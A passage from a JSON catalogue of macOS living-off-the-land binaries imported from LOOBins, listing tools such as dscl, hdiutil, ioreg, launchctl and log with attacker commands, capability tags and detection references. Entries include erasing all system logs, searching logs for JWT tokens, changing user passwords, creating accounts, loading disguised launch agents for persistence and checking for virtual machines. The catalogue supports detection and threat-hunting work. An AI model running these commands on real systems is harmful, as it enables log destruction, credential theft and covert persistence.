dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:ea5053a7d3a10be1","toolId":"loobins:dscl","toolName":"dscl","name":"Share enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl . -list /SharePoints\ndscl . list /SharePoints\ndscl . ls /SharePoints","description":"Enumerate all shares.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:f13b20540d299c2d","toolId":"loobins:dscl","toolName":"dscl","name":"Password policy discovery","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dscl . -read /Config/shadowhash\ndscl . read /Config/shadowhash\ndscl . cat /Config/shadowhash","description":"Gain password policy information","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:d03f29ced7de9fa7","toolId":"loobins:dscl","toolName":"dscl","name":"Change a user password","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"dscl . passwd /Users/$USERNAME oldPassword newPassword","description":"Change an existing user's password.","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dscl:f2b5add196364c9e","toolId":"loobins:dscl","toolName":"dscl","name":"Local account creation","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"dscl -create","description":"Create a local account","mitre":[],"fullPath":["/usr/bin/dscl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect user account creation with dscl","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dsconfigad:fd9fa9501ea9dc2b","toolId":"loobins:dsconfigad","toolName":"dsconfigad","name":"Retrieves the Active Directory configuration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dsconfigad -show","description":"Retrieves the Active Directory configuration","mitre":[],"fullPath":["/usr/sbin/dsconfigad"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsconfigad.yml","https://macosbin.com/bin/dsconfigad","https://www.unix.com/man-page/osx/8/dsconfigad/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dsconfigad:ccfb8e32a60568c7","toolId":"loobins:dsconfigad","toolName":"dsconfigad","name":"Retrieves the Active Directory name","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"dsconfigad -show |awk '/Active Directory Domain/{print $NF}'","description":"Retrieves the Active Directory name","mitre":[],"fullPath":["/usr/sbin/dsconfigad"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsconfigad.yml","https://macosbin.com/bin/dsconfigad","https://www.unix.com/man-page/osx/8/dsconfigad/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dsexport:3d1f9656f3a0dec0","toolId":"loobins:dsexport","toolName":"dsexport","name":"Export local host users","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Reconnaissance","Discovery"],"command":"dsexport local_users.txt /Local/Default dsRecTypeStandard:Users","description":"Export the local host user information to a file","mitre":[],"fullPath":["/usr/bin/dsexport"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsexport.yml"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:dsexport:ff2f12c762222565","toolId":"loobins:dsexport","toolName":"dsexport","name":"Export local host groups","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Reconnaissance","Discovery"],"command":"dsexport local_groups.txt /Local/Default dsRecTypeStandard:Groups","description":"Export the local host group information to a file","mitre":[],"fullPath":["/usr/bin/dsexport"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsexport.yml"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:funzip:bb11ba6035aeeb1b","toolId":"loobins:funzip","toolName":"funzip","name":"extracts a ZIP or gzip file directly to output from archives or other piped input","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"tail -c <> $0 | funzip -<password>","description":"funzip is a macOS utility used to extract ZIP or gzip files directly to output. Malicious binaries misuse funzip, along with head or tail, to extract and reconstruct password-protected malicious payloads.","mitre":[],"fullPath":["/usr/bin/funzip"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/funzip.yml","https://www.uptycs.com/blog/threat-research-report-team/macos-bashed-apples-of-shlayer-and-bundlore","https://linux.die.net/man/1/funzip"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:hdiutil:1871b601315b0601","toolId":"loobins:hdiutil","toolName":"hdiutil","name":"Mount a malicious dmg file","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"hdiutil mount malicious.dmg","description":"Uses hdiutil to mount a malicious dmg file to the system.","mitre":[],"fullPath":["/usr/bin/hdiutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Disk Image Mounting Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml"},{"type":"Sigma: Disk Image Creation Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml","https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:hdiutil:915ec2752516eb85","toolId":"loobins:hdiutil","toolName":"hdiutil","name":"Mount a malicious dmg file","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"hdiutil attach malicious.dmg","description":"Uses hdiutil to mount a malicious dmg file to the system.","mitre":[],"fullPath":["/usr/bin/hdiutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Disk Image Mounting Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml"},{"type":"Sigma: Disk Image Creation Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml","https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:hdiutil:18567315e0b4f271","toolId":"loobins:hdiutil","toolName":"hdiutil","name":"Mount a malicious iso file","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"hdiutil mount malicious.iso","description":"Uses hdiutil to mount a malicious iso file to the system.","mitre":[],"fullPath":["/usr/bin/hdiutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Disk Image Mounting Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml"},{"type":"Sigma: Disk Image Creation Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml","https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:hdiutil:ccc86b6f28e110a5","toolId":"loobins:hdiutil","toolName":"hdiutil","name":"Mount a malicious iso file","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"hdiutil attach malicious.iso","description":"Uses hdiutil to mount a malicious iso file to the system.","mitre":[],"fullPath":["/usr/bin/hdiutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Disk Image Mounting Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml"},{"type":"Sigma: Disk Image Creation Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml","https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:hdiutil:66e95ce99ee93ded","toolId":"loobins:hdiutil","toolName":"hdiutil","name":"Exfiltrate data in dmg file","source":"LOOBins","platform":["macOS"],"capability":["Collection"],"nativeCategory":["Collection"],"command":"hdiutil create -volname \"Volume Name\" -srcfolder /path/to/folder -ov diskimage.dmg","description":"Uses hdiutil to create a dmg file to store exfiltrate data","mitre":[],"fullPath":["/usr/bin/hdiutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Disk Image Mounting Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml"},{"type":"Sigma: Disk Image Creation Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml","https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:hdiutil:3abba42650076ac3","toolId":"loobins:hdiutil","toolName":"hdiutil","name":"Exfiltrate data in encrypted dmg file","source":"LOOBins","platform":["macOS"],"capability":["Collection"],"nativeCategory":["Collection"],"command":"hdiutil create -encryption -stdinpass -volname \"Volume Name\" -srcfolder /path/to/folder -ov encrypteddiskimage.dmg","description":"Uses hdiutil to create a dmg file to store exfiltrate data","mitre":[],"fullPath":["/usr/bin/hdiutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Disk Image Mounting Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml"},{"type":"Sigma: Disk Image Creation Via Hdiutil","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml","https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ioreg:dcc33326372b51d5","toolId":"loobins:ioreg","toolName":"ioreg","name":"Use ioreg to check whether the remote macOS screen is locked.","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"ioreg -n Root -d1 -a | grep CGSSession","description":"The following command will display a list of keys that contain \"CGSSession\". If the key \"CGSSessionScreenIsLocked\" is present, the screen is actively locked.","mitre":[],"fullPath":["/usr/sbin/ioreg"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using Ioreg","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml"},{"type":"Jamf Protect: Ioreg used to detect if the screen is locked","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml","https://evasions.checkpoint.com/src/MacOS/macos.html","https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ioreg:b067f0c68c730682","toolId":"loobins:ioreg","toolName":"ioreg","name":"Use ioreg to check whether the host is on a physical machine or a VM","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Collection"],"nativeCategory":["Discovery","Collection"],"command":"ioreg -rd1 -c IOPlatformExpertDevice","description":"Check the output of this command (specifically the IOPlatformSerialNumber, board-id, and manufacturer fields) to check whether or not this host is in a virtual machine.","mitre":[],"fullPath":["/usr/sbin/ioreg"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using Ioreg","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml"},{"type":"Jamf Protect: Ioreg used to detect if the screen is locked","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml","https://evasions.checkpoint.com/src/MacOS/macos.html","https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ioreg:cd37720e15a402b9","toolId":"loobins:ioreg","toolName":"ioreg","name":"Use ioreg to check USB device vendor names","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Collection"],"nativeCategory":["Discovery","Collection"],"command":"ioreg -rd1 -c IOUSBHostDevice","description":"Grep for \"USB Vendor Name\" values to view USB vendor names. On virtualized hardware these values may contain the hypervisor name such as \"VirtualBox\". This is an additional way to check for virtualization.","mitre":[],"fullPath":["/usr/sbin/ioreg"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using Ioreg","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml"},{"type":"Jamf Protect: Ioreg used to detect if the screen is locked","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml","https://evasions.checkpoint.com/src/MacOS/macos.html","https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:ioreg:fbb090f474aa6ca4","toolId":"loobins:ioreg","toolName":"ioreg","name":"Check all ioreg properties for hypervisor names.","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Collection"],"nativeCategory":["Discovery","Collection"],"command":"ioreg -l","description":"Grep for \"virtual box\", \"oracle\", and \"vmware\" from the output of the ioreg -l command. This is an additional way to check for virtualization.","mitre":[],"fullPath":["/usr/sbin/ioreg"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using Ioreg","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml"},{"type":"Jamf Protect: Ioreg used to detect if the screen is locked","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/lockscreen_check"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml","https://evasions.checkpoint.com/src/MacOS/macos.html","https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:kextstat:c2c6f26bdef46a47","toolId":"loobins:kextstat","toolName":"kextstat","name":"List kernel extensions","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kexstat","description":"Uses kexstat showloaded to display kernel extensions and address in kernel memory it has been loaded","mitre":[],"fullPath":["/usr/sbin/kextstat"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/kextstat.yml","https://ss64.com/osx/kextstat.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:last:6dcde1a1bfcae0a2","toolId":"loobins:last","toolName":"last","name":"Enumerate the users who are currently logged into the system.","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"last | grep \"still logged in\"","description":"The following command will display sessions that are currently active.","mitre":[],"fullPath":["/usr/bin/last"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Network Connections Discovery","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml","https://ss64.com/osx/last.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:last:ed7e3de067377640","toolId":"loobins:last","toolName":"last","name":"Enumerate all user accounts that have logged into the system previously.","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"last -t console","description":"The last command can be used to output users who have previously logged in, by specifying the tty interface 'console'.","mitre":[],"fullPath":["/usr/bin/last"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Network Connections Discovery","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml","https://ss64.com/osx/last.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:last:5ba5734955e17f30","toolId":"loobins:last","toolName":"last","name":"Enumerate all hosts that have remotely logged into the system before.","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"last | grep -E '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+'","description":"An attacker can use 'last' with a filter to retrieve the connection date and remote host information for remote logins.","mitre":[],"fullPath":["/usr/bin/last"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Network Connections Discovery","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml","https://ss64.com/osx/last.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:launchctl:cab792e5e586c548","toolId":"loobins:launchctl","toolName":"launchctl","name":"Use launchctl to execute an application","source":"LOOBins","platform":["macOS"],"capability":["Execution","Persistence"],"nativeCategory":["Execution","Persistence"],"command":"sudo launchctl load /Library/LaunchAgent/com.apple.installer","description":"A oneliner that will load a plist as a LaunchAgent or LaunchDaemon, achieving persistence on a target machine. This command requires root privileges.","mitre":[],"fullPath":["/bin/launchctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications.","value":"LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications."},{"type":"Jamf Protect: Detect launchctl activity that unloads or bootsout specific service","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/launchctl_unload_and_bootout_events"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/launchctl.yml","https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/","https://attack.mitre.org/techniques/T1569/001/","https://attack.mitre.org/techniques/T1543/001/","https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:launchctl:e0168ff2595cd079","toolId":"loobins:launchctl","toolName":"launchctl","name":"Persistent launch agent","source":"LOOBins","platform":["macOS"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist","description":"Creation of a persistent launch agent called with $HOME/Library/LaunchAgents/com.apple.updates.plist","mitre":[],"fullPath":["/bin/launchctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications.","value":"LaunchAgents and LaunchDaemons must have a plist file on disk in the root, system, or user Library directory. Monitoring for plist's with executables located in /tmp or /Shared could identify suspicious applications."},{"type":"Jamf Protect: Detect launchctl activity that unloads or bootsout specific service","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/launchctl_unload_and_bootout_events"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/launchctl.yml","https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/","https://attack.mitre.org/techniques/T1569/001/","https://attack.mitre.org/techniques/T1543/001/","https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:log:32d51b69b7129486","toolId":"loobins:log","toolName":"log","name":"Remove all log messages","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"log erase --all","description":"An attacker can cover up their tracks by removing all log messages using the following command. Requires root privileges.","mitre":[],"fullPath":["/usr/bin/log"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/log.yml","https://shellcromancer.io/posts/living-off-of-macos/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:log:4e78bd2f52cfc999","toolId":"loobins:log","toolName":"log","name":"Search log messages for tokens","source":"LOOBins","platform":["macOS"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"log show --info --debug --predicate 'eventMessage CONTAINS[d] \"eyJ\"'","description":"An attacker can potentially search log messages and review if they do contain sensitive information like jwt tokens.","mitre":[],"fullPath":["/usr/bin/log"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/log.yml","https://shellcromancer.io/posts/living-off-of-macos/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:lsregister:160ac1ed847c10ba","toolId":"loobins:lsregister","toolName":"lsregister","name":"Force an update of the Launch Services database","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -f","description":"The -f flag can be used to force an update of the Launch Services database. This can be used to quickly register a custom URL scheme that points to a malicious app.","mitre":[],"fullPath":["/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of 